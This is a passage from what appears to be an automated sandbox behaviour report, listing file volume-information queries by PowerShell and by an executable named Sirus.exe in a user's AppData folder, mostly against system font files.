      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Sirus.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
